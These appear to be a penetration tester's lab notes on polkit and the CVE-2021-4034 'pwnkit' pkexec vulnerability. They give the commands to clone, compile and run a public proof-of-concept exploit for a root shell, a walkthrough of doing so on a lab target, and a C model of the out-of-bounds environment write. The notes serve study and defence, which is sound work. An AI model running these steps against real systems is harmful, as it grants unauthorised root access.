# Intro

- `polkit` (formerly PolicyKit) is an authorization service for Linux: unprivileged user software asks a privileged system component to perform an action, and that component asks `polkit` whether the caller is allowed to
- To check whether the calling process is authorized for a specific action, the privileged service queries `polkit` before acting
- With `polkit`, it is possible to set how permissions are granted by default for each user and application
- `polkit` works with two groups of files:
	1. actions/policies (`/usr/share/polkit-1/actions`, XML `.policy` files that declare each action and its default authorization)
	2. rules (`/usr/share/polkit-1/rules.d` for packaged rules and `/etc/polkit-1/rules.d` for admin rules; JavaScript `.rules` files)
- `polkit` also has `local authority` rules which can be used to grant or remove additional permissions for users and groups (the mechanism of older releases such as `0.105`, long shipped by Debian/Ubuntu)
- Custom local authority rules go in the directory `/etc/polkit-1/localauthority/50-local.d` with the file extension `.pkla`
- `polkit` also comes with three additional programs:
	- `pkexec` - runs a program with the rights of another user or with root rights (root is the default when `-u` is omitted)
	- `pkaction` - lists the registered actions
	- `pkcheck` - checks whether a process is authorized for a specific action

# CVE-2021-4034 - `pkexec` exploit aka `pwnkit`

- Of the additional programs associated with `polkit`, `pkexec` is the most interesting to a pentester because it is SUID root and works like `sudo`
- `pkexec` syntax

```bash
pkexec -u <target_user> <command>
# for example
pkexec -u root id
```

- [CVE-2021-4034](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034) (aka `pwnkit`) is a memory corruption vuln in `pkexec`: when `pkexec` is executed with an empty argument list (`argc == 0`), its option parsing reads `argv[1]`, which in that layout is really `envp[0]`, and later writes a resolved path back into that slot (an out-of-bounds read and write). An unprivileged local user can use this to inject environment variables into the SUID-root process and run code as root. The bug had been present since `pkexec`'s first version in 2009 and was fixed upstream on 2022-01-25
- [PwnKit-Hunter](https://github.com/cyberark/PwnKit-Hunter) can be used to check whether the installed `polkit` is vulnerable to `pwnkit`; do not rely on the version string alone, since distros backport the fix without bumping it
- Once the vulnerability is confirmed, this [PoC](https://github.com/arthepsy/CVE-2021-4034) can be used to exploit it

```bash
git clone https://github.com/arthepsy/CVE-2021-4034.git
cd CVE-2021-4034
gcc cve-2021-4034-poc.c -o poc
```

- After compiling the exploit, execute it to get a root shell; optionally change from the standard shell (`sh`) to Bash (`bash`) before proceeding

```bash
./poc
```

- If patching is not immediately possible, the usual stopgap is to strip the SUID bit (`chmod 0755 /usr/bin/pkexec`); conversely, a `pkexec` that is still `-rwsr-xr-x` on an unpatched host is what to look for during enum

---

# Exercise

## initial enum

- `ping` test

![[images/Pasted image 20260214143613.png]]

- `nmap` scans

![[images/Pasted image 20260214143825.png]]

- `ssh` into target with given creds
- light internal enum

![[images/Pasted image 20260214143950.png]]

## `pwnkit` enum

- use [PwnKit-Hunter](https://github.com/cyberark/PwnKit-Hunter) to enum for the `pwnkit` vuln
- `git clone` on Kali

![[images/Pasted image 20260214144314.png]]

- move to target

![[images/Pasted image 20260214144325.png]]

- make executable and run

![[images/Pasted image 20260214144333.png]]

- the version of `polkit` on the target is vulnerable to `CVE-2021-4034`

## `pwnkit` exploit

- `sudo git clone https://github.com/arthepsy/CVE-2021-4034.git` on Kali

![[images/Pasted image 20260214144635.png]]

- there's a `glibc` version mismatch between Kali and target, so a binary compiled on Kali fails to run there

![[images/Pasted image 20260214144741.png]]

- since the target has `gcc`, compile on target to avoid errors (if it didn't, the alternatives are a static build or compiling on a box with the same distro/glibc)
- serve the `.c` from Kali

![[images/Pasted image 20260214144846.png]]

- `wget` from target

![[images/Pasted image 20260214144852.png]]

- now compile > successful

![[images/Pasted image 20260214144925.png]]

- execute `poc` > we're root!

![[images/Pasted image 20260214145010.png]]
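To see why the `pwnkit` PoC from the section above works, here is a C model of the bug. It is an added example, not code from these notes, from `polkit`, or from the linked PoC. It rebuilds in user space (no `execve`, no SUID binary) the two facts the exploit rests on: with `argc == 0` the vector holding `argv` has `argv[1]` aliased to `envp[0]`, and `pkexec`'s pre-fix argument handling reads that slot and writes a resolved path back into it. The fake filesystem, the fake `PATH` value `GCONV_PATH=.`, and the function names `find_program_in_fake_path`, `vulnerable_arg_handling`, `fixed_arg_handling`, `demo_argc0` and `demo_normal` are all constructed for the example (the directory-name trick mirrors the technique described in the Qualys advisory). `fixed_arg_handling` models the upstream fix, which refuses to continue when `argc < 1`.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed "filesystem": the only paths that exist in this model. The
 * second entry is an attacker-created file inside a directory whose name
 * looks like an environment-variable assignment. */
static const char *fake_files[] = {
    "/usr/bin/id",
    "GCONV_PATH=./pwnkit",
    NULL
};

/* Stand-in for g_find_program_in_path(): walks the colon-separated path_env
 * and returns a malloc'd "<dir>/<name>" for the first entry that exists in
 * fake_files, or NULL if none does. */
char *find_program_in_fake_path(const char *name, const char *path_env)
{
    char *copy = strdup(path_env);
    char *save = NULL;
    char *result = NULL;

    for (char *dir = strtok_r(copy, ":", &save);
         dir != NULL && result == NULL;
         dir = strtok_r(NULL, ":", &save)) {
        size_t len = strlen(dir) + 1 + strlen(name) + 1;
        char *candidate = malloc(len);
        snprintf(candidate, len, "%s/%s", dir, name);
        for (const char **f = fake_files; *f != NULL; f++) {
            if (strcmp(*f, candidate) == 0) {
                result = candidate;
                break;
            }
        }
        if (result == NULL)
            free(candidate);
    }
    free(copy);
    return result;
}

/* Model of pkexec's argument handling before the fix. The option loop never
 * runs when argc == 0, so n stays 1 and argv[1] is read. With argc == 0 the
 * kernel lays out argv as {NULL} immediately followed by envp, so argv[1]
 * *is* envp[0]: an out-of-bounds read, and "argv[n] = s" below is an
 * out-of-bounds write into envp[0]. Returns 1 if that write happened. */
int vulnerable_arg_handling(int argc, char **argv, const char *path_env)
{
    int n;
    for (n = 1; n < argc; n++) {
        if (argv[n][0] != '-')      /* first non-option is the program */
            break;
    }
    char *path = argv[n];           /* OOB read when argc == 0 */
    if (path == NULL)
        return 0;                   /* real pkexec would crash here */
    if (path[0] != '/') {
        char *s = find_program_in_fake_path(path, path_env);
        if (s == NULL)
            return 0;
        argv[n] = s;                /* OOB write when argc == 0 */
        return 1;
    }
    return 0;
}

/* The upstream fix: refuse to run at all when argc < 1 (pkexec exits 127). */
int fixed_arg_handling(int argc, char **argv, const char *path_env)
{
    if (argc < 1)
        return 127;
    return vulnerable_arg_handling(argc, argv, path_env);
}

/* Rebuilds the argc == 0 layout (constructed, no execve): vec[0] is argv's
 * terminating NULL, vec[1..2] are envp, vec[3] ends envp. Returns envp[0]
 * after the chosen handler ran, i.e. whether a variable got injected. */
const char *demo_argc0(int use_fixed)
{
    static char *vec[4];
    vec[0] = NULL;                  /* argv = {NULL}: argc == 0 */
    vec[1] = "pwnkit";              /* envp[0]: what pkexec takes as the program */
    vec[2] = "HOME=/home/user";     /* envp[1] */
    vec[3] = NULL;
    char **argv = vec;
    char **envp = vec + 1;
    const char *path_env = "GCONV_PATH=.";   /* attacker-controlled PATH */

    if (use_fixed)
        fixed_arg_handling(0, argv, path_env);
    else
        vulnerable_arg_handling(0, argv, path_env);
    return envp[0];
}

/* Ordinary invocation (argc == 2): the program resolves through PATH as
 * intended and nothing outside argv is touched. Returns 1 on success. */
int demo_normal(void)
{
    char *argv[] = { "pkexec", "id", NULL };
    int ok = vulnerable_arg_handling(2, argv, "/usr/bin") == 1
          && strcmp(argv[1], "/usr/bin/id") == 0;
    if (ok)
        free(argv[1]);
    return ok;
}

int main(void)
{
    printf("vulnerable: envp[0] = %s\n", demo_argc0(0));
    printf("fixed:      envp[0] = %s\n", demo_argc0(1));
    return 0;
}
```

Run as-is and the vulnerable path turns the harmless `envp[0]` of `pwnkit` into `GCONV_PATH=./pwnkit`, a brand-new environment variable the attacker never had to pass through the SUID boundary; the fixed path leaves the environment untouched. The real exploit then only needs glibc's iconv machinery to load a shared object from that `GCONV_PATH`, which is what the linked PoC automates.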